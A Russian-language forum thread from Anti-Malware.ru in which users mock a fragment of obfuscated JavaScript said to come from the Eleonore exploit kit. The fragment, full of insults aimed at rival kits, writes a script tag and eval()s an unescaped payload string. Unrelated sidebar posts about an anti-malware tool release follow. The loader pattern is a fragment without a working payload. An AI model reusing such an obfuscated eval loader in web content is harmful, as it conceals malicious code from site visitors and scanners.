Забава - Свободное общение - Форумы Anti-Malware.ru Перейти к содержанию

Recommended Posts

vaber

Не смог удержаться, чтобы не запостить =))

Вот такая нынче идет конкурентная борьба у разработчиков exploit toolkits =)))

Для тех кто не в теме fragus и liberty - это эксплоит тулкиты. Данный пример куска кода - из Eleonore Exploits pack.

function XeXeXe(lolssslol,loffdfl,lolsdd){var fragus_loshara = ' polni tupoi pidor ';return eval(fragus_loshara);}var pidorastkav9 ='';var pidor = '';var piDFGHDSr = 'Su ch Fragus LOX =) ka Liberti toze LOX ';function Hezehe(loffsdfg,lsd){var fragus_loshara_typoi = ' polni tupoi pidor vashe chmo';return document.write(fragus_loshara_typoi);}var liberty_loh_da = lss(pidorastkav9,lohh);liberty_loh_da = unescape(liberty_loh_da);mdeexuiten.write('<scri'+unescape('%70%74%3e')); var piDFGsdHDSr = 'Su ch Fragus LOX =) ka Liberti toze LOX ';mdeexuiten.write('var x = unescape(liberty_loh_da);eval(x)');var piDFGsdsvfdsHDSr = 'Su ch Fragus LOX =) ka Liberti toze LOX ';var piDasdffr = 'Su ch Fragus LOX =) ka Liberti toze LOX ';

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

Такое прекрасное знание великого и могучего не дает поводов для сомнений в национальности написавшего сей дивный код :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
TANUKI

Школьники такие школьники :) Что тут еще сказать? :)

И эти пионеры претендуют на то, что бы стать в один ряд с мега-легендарным Митником идругими? :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Guest Pernat1y
И эти пионеры претендуют на то, что бы стать в один ряд с мега-легендарным Митником идругими? :)

Митник слегка из другой оперы. он больше по соц. инженерии :rolleyes:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • demkd
      Проблема оказалась в редакции windows, для home нужно дополнительно прописывать флаг в реестр, в RC4 теперь это делается автоматически.
        Добавил функцию для образов.

      ---------------------------------------------------------
       5.0.RC4
      ---------------------------------------------------------
      o Добавлена поддержка включения отслеживания командной строки процессов для "Home" редакций Windows.
        Теперь при включении отслеживания в лог печатается статус этой опции.

      o Функция "Распечатать в лог топ-10 процессов пересекающихся по времени с этим процессом" теперь доступа и при работе с образом,
        если образ сделан при активном отслеживании процессов.

      o Исправлена критическая ошибка при создании файла описания для скопированного в Zoo большого текстового файла (vbs/cmd и т.д.).

       
    • santy
      Привет. По 5.0 RC3 Это работает. (саму команду еще не проверил как работает). И в цепочку процесс укладывается, хотя цепочка достаточно запутана, но к сожалению, отслеживание командной строки не включилось по какой-то причине. Возможно потому что не был отключен антивирус MBAM.
       o В окне истории процессов и задач в контекстное меню процесса добавлен новый пункт: 
         "Распечатать в лог топ-10 процессов пересекающихся по времени с этим процессом"
         Это может быть полезно при поиске процесса модифицировавшего неявно запущенный им процесс. Функция есть в истории процессов и задач, но работает видимо только из активной системы.                           DESKTOP-867G3VL_2025-07-15_20-59-13_v5.0.RC3.v x64.7z
    • demkd
      Да, с этим файлом проблема, починю.
    • PR55.RP55
      В настройках добавить: Отправлять лог применения\выполнения скрипта на сервер\адресату. Уникальный идентификатор прописывается в скрипт при его генерации. т.е. Оператор не запрашивает результат выполнения скрипта у пользователя.    
    • Ego Dekker
      Домашние антивирусы для Windows были обновлены до версии 18.2.14.
×